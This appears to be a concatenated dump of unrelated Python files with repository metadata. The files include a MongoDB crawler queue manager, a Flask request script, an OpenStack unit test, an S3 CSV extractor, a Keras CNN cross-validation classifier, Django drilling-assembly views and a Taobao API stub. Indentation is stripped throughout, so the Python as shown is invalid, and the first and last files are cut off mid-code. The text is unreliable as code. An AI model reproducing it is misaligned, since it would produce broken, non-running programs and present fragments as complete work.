if tup[0] in dups:
continue
else:
dups.append(tup[0])
requests.append(tup[1])
if len(requests) > 0:
self.mc[dbName][collName].bulk_write(requests)
t_diff = time.time() - t0
info = "handle_write_queue,db:%s,coll:%s,size:%s,t_diff:%s" % (dbName, collName, qsize, t_diff)
self.logger.info(info)
def _handle_count_queue(self, limit):
if self.count_queue.qsize() >= limit:
t0 = time.time()
requests = []
qsize = self.count_queue.qsize()
while self.count_queue.qsize() > 0:
try:
tmp = self.count_queue.get_nowait()
self.count_queue.task_done()
except Exception as e:
self.logger.error(str(e))
break
requests.append(tmp)
if len(requests) > 0:
self.mc[settings.count_db_name][settings.count_coll_name].bulk_write(requests)
t_diff = time.time() - t0
info = "handle_count_queue,size:%s,t_diff,%s" % (qsize, t_diff)
self.logger.info(info)
@defer.inlineCallbacks
def _common_put_task_to_db(self, dbName, collName, data):
t0 = time.time()
self.init_write_queue(dbName, collName)
# Statistics
res = yield self.mc[dbName][collName].find({"url": {"$in": list(set([t['url'] for t in data]))}}, {'url': 1})
exists = [r['url'] for r in res]
self.saveCountData(dbName, collName, common.NEW_TASK, len(data) - len(exists))
# Update the data
for t in data:
if t["url"] not in exists:
self.write_queues[dbName][collName].put((t['url'], InsertOne(t)))
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
defer.returnValue([])
@defer.inlineCallbacks
def _common_get_task_from_db(self, dbName, collName, count):
t0 = time.time()
self.init_task_queue(dbName, collName)
info = '%s, %s, qsize:%s' % (dbName, collName, self.task_queues[dbName][collName].qsize())
self.logger.debug(info)
if self.task_queues[dbName][collName].qsize() <= 0:
t1 = time.time()
tasks = yield self.mc[dbName][collName].find({'status': common.NOT_CRAWL},
limit=count * 10) # .limit(settings.get_tasks_num_one_time)
# tasks = self.mc[dbName][collName].find({'status':common.NOT_CRAWL}, limit=settings.get_tasks_num_one_time)
requests, ts = [], []
for task in tasks:
requests.append(
UpdateMany({'url': task["url"]}, {"$set": {"status": common.CRAWLING, "last_crawl_time": 0}}))
task.pop('_id')
ts.append(task)
if len(requests) > 0:
# self.mc[dbName][collName].bulk_write(requests)
yield self.mc[dbName][collName].bulk_write(requests)
for t in ts:
self.task_queues[dbName][collName].put(t)
t_diff = time.time() - t1
info = "query mongo, %s, %s, get:%s, use time:%s" % (dbName, collName, len(ts), t_diff)
self.logger.debug(info)
ts = []
for x in range(count):
try:
t = self.task_queues[dbName][collName].get_nowait()
self.task_queues[dbName][collName].task_done()
ts.append(t)
except Exception:
# the task queue is empty; nothing more to fetch
continue
t_diff = time.time() - t0
info = "total, %s, %s, return : %s , use time : %s" % (dbName, collName, len(ts), t_diff)
self.logger.debug(info)
defer.returnValue(ts)
def _common_change_task_status(self, dbName, collName, data):
t0 = time.time()
self.init_write_queue(dbName, collName)
# Statistics
success = [t['url'] for t in data if t['status'] == common.CRAWL_SUCCESS]
self.saveCountData(dbName, collName, common.ONE_TASK, len(success))
# Update the data
for t in data:
# self.logger.debug('url:%s,status:%s'%(t['url'],t['status']))
self.write_queues[dbName][collName].put(
(t['url'],
UpdateMany({'url': t['url']},
{"$set": {'status': t['status'],
'last_crawl_time': time.time()
}})
)
)
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_put_data_to_db(self, dbName, collName, data):
"""为了性能,使用的是eplace方法"""
t0 = time.time()
self.init_write_queue(dbName, collName)
# Statistics
self.saveCountData(dbName, collName, common.ONE_DATA, len(data))
#
for t in data:
t['crawl_time'] = time.time()
self.write_queues[dbName][collName].put((t['url'], ReplaceOne({'url': t['url']}, t, upsert=True)))
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_insert_data_if_not_exist(self, dbName, collName, data):
"""如果数据不存在则插入,否则pass"""
t0 = time.time()
for t in data:
if not self.mc[dbName][collName].find_one({'url': t['url']}):
t['crawl_time'] = time.time()
self.mc[dbName][collName].insert_one(t)
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_update_data(self, dbName, collName, data):
"""更新数据"""
t0 = time.time()
self.init_write_queue(dbName, collName)
for t in data:
t['crawl_time'] = time.time()
self.write_queues[dbName][collName].put((t['url'],
UpdateOne({'url': t['url']}, {'$set': t}, upsert=True)))  # pymongo's UpdateOne requires an update-operator document such as {'$set': ...}
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
# Store statistics data
def saveCountData(self, dbName, collName, _type, count):
date = time.strftime("%Y-%m-%d", time.localtime())
# Per-site
u1 = UpdateOne({'date': date, 'dbName': dbName, 'collName': collName, "_type": _type},
{'$inc': {'total': count}}, upsert=True)
# Overall
u2 = UpdateOne({'date': date, 'dbName': "all", 'collName': "all", "_type": _type}, {'$inc': {'total': count}},
upsert=True)
self.count_queue.put(u1)
self.count_queue.put(u2)
if __name__ == '__main__':
pass
|
[
"bestrenxs@gmail.com"
] |
bestrenxs@gmail.com
|
7ea06b38a6bea4ad844f28beed5014ddf7ec3be8
|
7899e522049f9c7aac5cc9a19a0e3cc36c132067
|
/FlaskAPI/requests.py
|
687a42138dd8d640c816138effcbcda6e9996c52
|
[] |
no_license
|
adityapoojary/ds_salary_proj
|
261e25a7bd48d1402e9e425d7f1c18eeb5d2c3bf
|
720fed3c0fcbe5169dd13799dc08fe7eb422906b
|
refs/heads/master
| 2023-08-11T04:52:14.493436 | 2021-09-21T01:17:40 | 2021-09-21T01:17:40 | 380,216,228 | 0 | 0 | null | 2021-06-27T03:59:13 | 2021-06-25T11:26:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 301 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 29 23:53:45 2021
@author: adity
"""
import requests
from data_input import data_in
URL = 'http://127.0.0.1:5000/predict'
headers = {"Content-Type": "application/json"}
data = {"input":data_in}
r = requests.get(URL,headers=headers,json=data)
r.json()
|
[
"43313663+SirHacksalott@users.noreply.github.com"
] |
43313663+SirHacksalott@users.noreply.github.com
|
21a3244c094f2c6fdba9b385874dde119094b631
|
525690b220962de7f6253dd1dc557717cffc3441
|
/openstack/tests/unit/cloud_eye/test_cloudeye_service.py
|
35b73816fe5fdd9edf0eaeabe9ed72d39d48f02c
|
[
"Apache-2.0"
] |
permissive
|
huaweicloudsdk/sdk-python
|
bb8dc2bc195d0bdaddf13fef484e3f28aeb2681f
|
60d75438d71ffb7998f5dc407ffa890cc98d3171
|
refs/heads/master
| 2021-06-05T00:04:59.030371 | 2018-09-30T09:40:49 | 2018-09-30T09:40:49 | 110,813,153 | 20 | 18 |
NOASSERTION
| 2020-07-23T17:01:59 | 2017-11-15T09:31:50 |
Python
|
UTF-8
|
Python
| false | false | 1,102 |
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.cloud_eye import cloud_eye_service
class TestCloudEyeService(testtools.TestCase):
def test_service(self):
sot = cloud_eye_service.CloudEyeService()
self.assertEqual('cloud-eye', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
|
[
"iampurse@vip.qq.com"
] |
iampurse@vip.qq.com
|
9713a8500afd874259cb4bbe41e73268a84767b0
|
f735f133ef299e65d3ea7d0d90a2dcbe49c030a1
|
/csv_file_extraction.py
|
697653884fa7ed26f2c33806628304fa4bcc7308
|
[] |
no_license
|
agrzybkowska/Data8Project
|
41bbd1ee39e2f45f3951348923afdadef1812bea
|
8c5decc720aae8b8555e7864b12361b46b57b2fa
|
refs/heads/master
| 2021-06-12T22:53:57.438660 | 2020-04-09T11:15:44 | 2020-04-09T11:15:44 | 254,408,086 | 0 | 0 | null | 2020-04-09T15:23:59 | 2020-04-09T15:23:59 | null |
UTF-8
|
Python
| false | false | 1,703 |
py
|
## not nicely packaged as a function yet, sorry
import boto3
from pprint import pprint
import csv
s3_client = boto3.client('s3')
contents = s3_client.list_objects_v2(Bucket='data8-engineering-project')['Contents']
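# Note: list_objects_v2 returns at most 1,000 keys per call; listing every
# object requires pagination, e.g. via s3_client.get_paginator('list_objects_v2').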
a= 0
for x in contents:
a = a + 1
b= a
splitfile = x['Key'].split('/')
if splitfile[0] == 'Academy': ### doesn't work for the Talent objects because they all fall beyond the first 1,000 keys in the listing
data = s3_client.get_object(Bucket='data8-engineering-project',
Key = x['Key'])
old_data = data['Body'].read().decode('utf-8').strip()
old_data1 =(old_data.replace(' ', ''))
old_data2 = old_data1.split()
print(old_data2)
csv_reader = csv.DictReader(old_data2)
with open('Blank_CSV' + str(b) + '.csv', 'w') as new_file:
fieldnames = ['name', 'trainer', 'IH_W1', 'IS_W1', 'PV_W1', 'PS_W1', 'SD_W1', 'SA_W1', 'IH_W2', 'IS_W2', 'PV_W2', 'PS_W2', 'SD_W2', 'SA_W2', 'IH_W3', 'IS_W3', 'PV_W3', 'PS_W3', 'SD_W3', 'SA_W3', 'IH_W4', 'IS_W4', 'PV_W4', 'PS_W4', 'SD_W4', 'SA_W4', 'IH_W5', 'IS_W5', 'PV_W5', 'PS_W5', 'SD_W5', 'SA_W5', 'IH_W6', 'IS_W6', 'PV_W6', 'PS_W6', 'SD_W6', 'SA_W6', 'IH_W7', 'IS_W7', 'PV_W7', 'PS_W7', 'SD_W7', 'SA_W7', 'IH_W8', 'IS_W8', 'PV_W8', 'PS_W8', 'SD_W8', 'SA_W8', 'IH_W9', 'IS_W9', 'PV_W9', 'PS_W9', 'SD_W9', 'SA_W9', 'IH_W10', 'IS_W10', 'PV_W10', 'PS_W10', 'SD_W10', 'SA_W10']
csv_writer = csv.DictWriter(new_file, fieldnames=fieldnames)
csv_writer.writeheader()
for line in csv_reader: # Iterates through the user_details file in read mode.
csv_writer.writerow(line)
|
[
"noreply@github.com"
] |
agrzybkowska.noreply@github.com
|
0e4635e67e5d0d55f1378f08260a7f06ee2e70cc
|
c6292c1dd68f0c4dd3389628de0d2b786fa0ee64
|
/0x06-python-classes/0-square.py
|
4c030f02dd19538abaad2c6f969458caac16080a
|
[] |
no_license
|
mj31508/holbertonschool-higher_level_programming2
|
835be695b568cd189c1448c54218a0201830005f
|
3fa47001c041cd0c74f88c3a19677e126bee37b4
|
refs/heads/master
| 2021-07-06T22:31:05.040354 | 2017-09-29T05:28:45 | 2017-09-29T05:28:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 79 |
py
|
#!/usr/bin/python3
"""
Defines empty class Square
"""
class Square:
pass
|
[
"mj31508@gmail.com"
] |
mj31508@gmail.com
|
9005aa6da759029734d49699d61f6dfb82e382ee
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_subordinating.py
|
f414e402006d840f8543ad90d26aa0594767e83c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 285 |
py
|
from xai.brain.wordbase.adjectives._subordinate import _SUBORDINATE
# class header
class _SUBORDINATING(_SUBORDINATE, ):
def __init__(self,):
_SUBORDINATE.__init__(self)
self.name = "SUBORDINATING"
self.specie = 'adjectives'
self.basic = "subordinate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
b4ed90aafb2fe13b609cabbd99a433643da13a2f
|
5708a5b29d386e60acb7f93b41339ab767e80411
|
/portal/posts/migrations/0011_post_confession.py
|
cdf0c988d532b89cb6422537939b90f4e57fe444
|
[] |
no_license
|
Pradyumnabiswal99/RestApiFounder
|
70a42ad3dce3f1818fd18cc3bae3b6bc81372a39
|
e031ac55830d74ca465427fae0e593ce94da236d
|
refs/heads/master
| 2023-02-19T12:25:24.515359 | 2020-02-24T18:16:33 | 2020-02-24T18:16:33 | 332,734,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 403 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0010_auto_20160920_1545'),
]
operations = [
migrations.AddField(
model_name='post',
name='confession',
field=models.BooleanField(default=False),
),
]
|
[
"kaushik.debojit@gmail.com"
] |
kaushik.debojit@gmail.com
|
b204c2541423dde521dadee3fceaa2623a7ebe59
|
7a4ed01a40e8d79126b26f5e8fca43c8e61e78fd
|
/Geeky Shows/Core Python/128.reduce_Function[159].py
|
de2e40159a3a8f0c556f8d593fb761aa271c252a
|
[] |
no_license
|
satyam-seth-learnings/python_learning
|
5a7f75bb613dcd7fedc31a1567a434039b9417f8
|
7e76c03e94f5c314dcf1bfae6f26b4a8a6e658da
|
refs/heads/main
| 2023-08-25T14:08:11.423875 | 2021-10-09T13:00:49 | 2021-10-09T13:00:49 | 333,840,032 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
from functools import reduce
a=[10,20,30,40,50]
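# reduce folds the list left to right: ((((10+20)+30)+40)+50) -> 150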
result=reduce(lambda n,m:n+m,a)
print(result)
print(type(result))
|
[
"satyam1998.1998@gmail.com"
] |
satyam1998.1998@gmail.com
|
fcb6271b2ee05afbde34d933504cfdd1ae3f7cc4
|
1647fced5b389cdee749bd81d809db6442b2c1d7
|
/listmethods/listmeth01.py
|
01f537ddf52561205afb339f82db6c2290d12669
|
[] |
no_license
|
Lalit554/mycode
|
774931e68db8a97a88bbcfc9c685c7844c7870c8
|
39d186fde871c3a118a0c65888390b0e81ff921f
|
refs/heads/main
| 2023-06-06T12:03:56.009416 | 2021-06-23T18:31:39 | 2021-06-23T18:31:39 | 361,773,554 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
#!/usr/bin/env python3
proto = ["ssh", "http", "https"]
print (proto)
print (proto[1])
proto.extend("dns") ## appends each letter as an element to the list
print(proto)
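# -> ['ssh', 'http', 'https', 'd', 'n', 's']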
|
[
"lalit.patil@fcagroup.com"
] |
lalit.patil@fcagroup.com
|
e9548f4466470f2ecbfe2b5aed82e666be9fd889
|
8648656c85014a8dee62334a6d85e9dcef17befb
|
/cnn_classifier_SaveAllFolds.py
|
8e906ed0b06288d2c9b08b9c9622ec09616d4ecb
|
[
"CC0-1.0"
] |
permissive
|
mohsen-azimi/SHM_CNN_CompressedData
|
865d0d6efef5e4a0ee7620a29c0721fe49ad3a97
|
0b5c82d8fa64fb791d3c9690d3a3de5632413cf3
|
refs/heads/master
| 2022-08-22T15:37:41.331974 | 2022-08-03T23:51:26 | 2022-08-03T23:51:26 | 231,650,234 | 6 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,475 |
py
|
import tensorflow as tf
import keras
from keras import Sequential
from keras.models import load_model
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers.normalization import BatchNormalization
from keras.layers import Dense, Flatten, Dropout, Conv1D, MaxPool1D, AvgPool1D,Conv2D, MaxPool2D, Activation
from keras.utils.vis_utils import plot_model
from utils import convert_matlab_file, load_dataset, plot_confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import StratifiedKFold
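# Note: sklearn.cross_validation was removed in scikit-learn 0.20; newer versions
# need sklearn.model_selection.StratifiedKFold and its split(X, y) iterator, and
# np.asscalar (used below) was removed in NumPy 1.23 in favour of ndarray.item().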
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from scipy import interp
from itertools import cycle
import hdf5storage
from keras.utils import np_utils
import numpy
import math
import scipy.io
import time
################################## for plot confusion imports
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
class History(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
self.loss = []
def on_epoch_end(self, epoch, logs={}):
self.acc.append(logs.get('acc'))
self.loss.append(logs.get('loss'))
def create_CNN_model():
model = Sequential()
# ................................................................................................................
model.add(Conv1D(filters=16, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=16, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Conv1D(filters=32, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=32, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Conv1D(filters=64, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=64, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Flatten())
model.add(BatchNormalization())
#
model.add(Dense(nClasses*1))
model.add(Dense(nClasses*1))
model.add(Dense(nClasses, activation='softmax'))
###################################################################################################################
learningRate = 0.00005
opt = keras.optimizers.Adam(lr=learningRate, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['acc', 'mse', 'mae','categorical_crossentropy'])
plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
model.summary()
# ...................................................................................................................
return model
# ...................................................................................................................
# #####################################################################################################################
loadMAT = 'A_SHM3_freq' # 1,2, 4,5,6,7
# loadMAT = 'A_SHM1' # 1,2, 4,5,6,7
saveMAT = loadMAT
saveModel = loadMAT
# #####################################################################################################################
def shuffle(a, b):
assert len(a) == len(b)
p = np.random.permutation(len(a))
return a[p], b[p]
# #####################################################################################################################
matlab_file = 'BenchMark/Outputs/'+loadMAT+'.mat'
mat = hdf5storage.loadmat(matlab_file)
InputData = np.transpose(mat['InputData'], (2, 0, 1))
TargetData = mat['TargetData']
nSamples = int(np.asscalar(mat['nSamples']))
lenSignal = int(np.asscalar(mat['lenSignal']))
nSensors = int(np.asscalar(mat['nSensors']))
nClasses = int(np.asscalar(mat['nClasses']))
X = InputData
Y = np_utils.to_categorical(TargetData)
X, Y = shuffle(X, Y)
# -----------------------------------------------------------------------------------------------------------------
# #####################################################################################################################
# -----------------------------------------------------------------------------------------------------------------
# ############ CNN ###############
# ################################
# ###############################
with tf.device("/gpu:1"):
print("Training is started")
t0 = time.time() # t0
nFolds = 10
skfold = StratifiedKFold(numpy.argmax(Y, axis=-1), n_folds=nFolds, shuffle=True, random_state=None)
print("skfold:",skfold)
fold = 1
for train_index, test_index in skfold:
model = create_CNN_model()
# model = create_SVC_model()
history = History()
# nepochs = 100
nepochs = 500
batchsize = 256
model.fit(X[train_index], Y[train_index], epochs=nepochs, batch_size=batchsize, callbacks=[history], verbose=1)
scores = model.evaluate(X[test_index], Y[test_index], verbose=1)
print(scores)
print("%s: %.2f" % (model.metrics_names[0], scores[0] ))
print("%s: %.2f" % (model.metrics_names[1], scores[1] ))
print("%s: %.2f" % (model.metrics_names[2], scores[2] ))
print("%s: %.2f" % (model.metrics_names[3], scores[3] ))
print("%s: %.2f" % (model.metrics_names[4], scores[4] ))
Y_testpred = model.predict_classes(X[test_index])
Y_testpredScores = model.predict(X[test_index])
# Compute confusion matrix
Y_testtrue = np.argmax(Y[test_index], axis=1)
cnf_matrix = confusion_matrix(Y_testtrue, Y_testpred)
# TH:
# model.save('saveModels/' + saveModel + '_TH_fold' + str(fold) + '.h5')
# Freq:
model.save('saveModels/' + saveModel + '_fold' + str(fold) + '.h5')
# TH:
# scipy.io.savemat('saveMATs/' + saveMAT + '_TH_fold' + str(fold) + '.mat', {
# Freq:
scipy.io.savemat('saveMATs/' + saveMAT + '_fold' + str(fold) + '.mat', {
'Y_true': Y_testtrue,
'Y_pred': Y_testpred,
'Y_predScores': Y_testpredScores,
'AccuracyTH': history.acc,
'LossTH': history.loss,
'nClasses': nClasses,
'nepochs': nepochs,
'batchsize': batchsize,
'scores': scores,
'cnf_matrix': cnf_matrix,
'nFolds': nFolds,
'fold': fold,
})
#
# np.set_printoptions(precision=2)
#
# # Plot non-normalized confusion matrix
# plt.figure()
# class_names = np.array(["Intact", "Pattern1", "Pattern2"],dtype='<U10')
# plot_confusion_matrix(cnf_matrix, classes=class_names,
# title='Confusion matrix, without normalization')
#
# # Plot normalized confusion matrix
# plt.figure()
# plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,
# title='Normalized confusion matrix')
#
# plt.show()
#
# plt.figure()
# plt.plot(range(0, nepochs), history.acc, 'b--') # plt.plot(range(0, nepochs*math.ceil(0.9*nSamples/batchsize)), history.acc, 'b--')
# plt.xlabel('Epochs')
# plt.ylabel('Accuracy')
# plt.show()
# plt.pause(0.05)
# plt.figure()
# plt.plot(range(0, nepochs), history.loss, 'r--')
# plt.xlabel('Epochs')
# plt.ylabel('Loss')
# plt.show()
# plt.pause(0.05)
t1 = time.time() # t1 at the end
print("Total Run Time: ", int(t1-t0), " seconds")
fold += 1
# ####################################################################################
# play something!
import winsound
duration = 2000 # milliseconds
freq = 440 # Hz
winsound.Beep(freq, duration)
|
[
"noreply@github.com"
] |
mohsen-azimi.noreply@github.com
|
0905cc6c738a84c48c2cf095039d96d8fe7af5d9
|
3b7e22b8c1cc96f6fd8440ad1ec1288bc2140d0f
|
/firstapp/views.py
|
3cd82201cd161e23cc248e9fe2646dd5313acf4e
|
[] |
no_license
|
bunnygoud25/mukeshportfolio
|
535c336ebb7fcad14a5bf14cf5ea6b19dd6ab1fb
|
96346b847df588ff345dff512eff6dba0273142e
|
refs/heads/master
| 2020-07-31T00:44:40.957487 | 2019-09-23T18:19:39 | 2019-09-23T18:19:39 | 209,590,626 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 280 |
py
|
from django.shortcuts import render
import os
from django.conf import settings
from django.http import HttpResponse, Http404
# Create your views here.
def index(request):
return render(request,'index.html')
def hire(request):
return render(request,'hire.html')
|
[
"bunnygoud25@gmail.com"
] |
bunnygoud25@gmail.com
|
8fd238c93ae823bd8fbe9ee076b046a2eeb24a10
|
e27ee08fbb99ca2abf0f822783603ac649a44f1d
|
/primeSum.py
|
3ea232f3c4d15d9413732d2f45dbba6556a07fd4
|
[] |
no_license
|
weida8/Practice
|
c2def43ffd7e1f43163616c4dbb5aaa697cc8c63
|
2de2a6076e12fe196a7eea89cc69fb3a59ceaec7
|
refs/heads/master
| 2021-01-23T13:31:33.914228 | 2018-07-24T04:21:58 | 2018-07-24T04:21:58 | 102,670,404 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
def isPrime(n):
for i in range(2, n):
if(n%i == 0):
return False
return True
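# Note: trial division up to n - 1 is correct but slow; checking divisors only
# up to int(n ** 0.5) + 1 would suffice for the 2,000,000 loop below.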
def main():
totalSum =0
for i in range(2, 2000000):
if(isPrime(i)):
print(i)
totalSum += i
print(totalSum)
main()
|
[
"noreply@github.com"
] |
weida8.noreply@github.com
|
e4f116f2d1e3e8c08ce2c7c35289d60e7a2455e5
|
3b2940c38412e5216527e35093396470060cca2f
|
/top/api/rest/SimbaAdgroupsChangedGetRequest.py
|
5b87c69b8afb5cee0f9b6ef7edd9ba1abccebb0d
|
[] |
no_license
|
akingthink/goods
|
842eb09daddc2611868b01ebd6e330e5dd7d50be
|
ffdb5868a8df5c2935fc6142edcdf4c661c84dca
|
refs/heads/master
| 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 398 |
py
|
'''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class SimbaAdgroupsChangedGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.nick = None
self.page_no = None
self.page_size = None
self.start_time = None
def getapiname(self):
return 'taobao.simba.adgroups.changed.get'
|
[
"yangwenjin@T4F-MBP-17.local"
] |
yangwenjin@T4F-MBP-17.local
|
ae75f741053ce7f25c92b229213b38134118e778
|
02619be3f115d170ab2e2951af482ef69698bbce
|
/bha/views.py
|
62c564cd3314ae02ecf027e66bcd9aa49932d51c
|
[] |
no_license
|
xkenneth/tdsurface
|
08852b5f9f809ed682e4b50938d60d711884d94a
|
ec15a05e581ec5f53287cab31af2f4f3e1efcb63
|
refs/heads/master
| 2021-03-12T23:11:32.547441 | 2009-08-12T20:58:29 | 2009-08-12T20:58:29 | 84,442 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,464 |
py
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponseNotFound
from django.http import Http404
from django.template import loader, Context
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from tdsurface.shortcuts import get_object_or_None
from tdsurface.depth.models import Run
from tdsurface.bha.models import *
from tdsurface.bha.forms import *
from django.utils import simplejson
MAX_JETS=9
MAX_PUMPS=3
def bha_update(request, object_id, extra_context=None) :
run = Run.objects.get(pk=object_id)
bha, created = BHA.objects.get_or_create(run=run)
bit, created = Bit.objects.get_or_create(bha=bha)
assets, created = SerializedAssests.objects.get_or_create(bha=bha)
jets = Jet.objects.filter(bit=bit)
if len(jets) < MAX_JETS :
for x in range(MAX_JETS - len(jets)) :
j = Jet(bit=bit)
j.save()
jets = Jet.objects.filter(bit=bit)
pumps = Pump.objects.filter(bha=bha).order_by('number')
if len(pumps) < MAX_PUMPS :
cnt = len(pumps)
for x in range(MAX_PUMPS - len(pumps)) :
cnt=cnt+1
p = Pump(bha=bha, number=cnt)
p.save()
pumps = Pump.objects.filter(bha=bha).order_by('number')
if request.method == 'POST':
bha_form = BHAForm(request.POST, instance=bha) # A form bound to the POST data
bit_form = BitForm(request.POST, instance=bit)
jet_forms = [JetForm(request.POST, prefix='jet'+str(x), instance=jets[x]) for x in range(MAX_JETS)]
pump_forms = [PumpForm(request.POST, prefix='pump'+str(x), instance=pumps[x]) for x in range(MAX_PUMPS)]
collar_form = CollarForm(request.POST)
probe_form = ProbeForm(request.POST)
surface_gear_form = SurfaceGearForm(request.POST)
if all([collar_form.is_valid(), probe_form.is_valid(), surface_gear_form.is_valid(), bha_form.is_valid(), bit_form.is_valid()] + [x.is_valid() for x in jet_forms] + [x.is_valid() for x in pump_forms]) : # All validation rules pass
bha_form.save()
bit_form.save()
for jet_form in jet_forms :
jet_form.save()
for pump_form in pump_forms :
pump_form.save()
d = {'pk':assets.pk, 'bha_id':assets.bha_id}
d.update(collar_form.cleaned_data)
d.update(probe_form.cleaned_data)
d.update(surface_gear_form.cleaned_data)
SerializedAssests(**d).save()
return HttpResponseRedirect(reverse('bha_update', args=[object_id]))
else :
bha_form = BHAForm(instance=bha)
bit_form = BitForm(instance=bit)
jet_forms = [JetForm(prefix='jet'+str(x), instance=jets[x]) for x in range(MAX_JETS)]
pump_forms = [PumpForm(prefix='pump'+str(x), instance=pumps[x]) for x in range(MAX_PUMPS)]
collar_form = CollarForm(initial=assets.__dict__)
probe_form = ProbeForm(initial=assets.__dict__)
surface_gear_form = SurfaceGearForm(initial=assets.__dict__)
pump_fields = []
for field in pump_forms[0].fields :
pump_fields.append([])
for pump_form in pump_forms :
cnt=0
for field in pump_form.fields :
pump_fields[cnt].append(field)
cnt = cnt+1
data = {'object': run,
'bha_form': bha_form,
'bit_form': bit_form,
'jet_forms': jet_forms,
'pump_forms': pump_forms,
'pump_fields': pump_fields,
'bha':bha,
'collar_form': collar_form,
'probe_form': probe_form,
'surface_gear_form': surface_gear_form,}
    if extra_context:  # guard against the default extra_context=None
        for key, value in extra_context.items():
            if callable(value):
                data[key] = value()
            else:
                data[key] = value
return render_to_response('bha_update_form.html', data, context_instance = RequestContext(request))
def bha_component_grid(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
page = int(request.GET['page'])
rows = int(request.GET['rows'])
sort_order= ''
if request.GET['sord'] == 'desc' :
sort_order= '-'
cs = Component.objects.filter(bha=bha).order_by(sort_order+request.GET['sidx'])
records = len(cs)
    total_pages = records / rows
if records % rows :
total_pages += 1
data={
'total': total_pages,
'page': page,
'records': records,
'rows' : [ ],
}
for r in cs[(page-1)*rows:page*rows] :
rd = {}
rd["id"] = r.pk
rd['order'] = str(r.order)
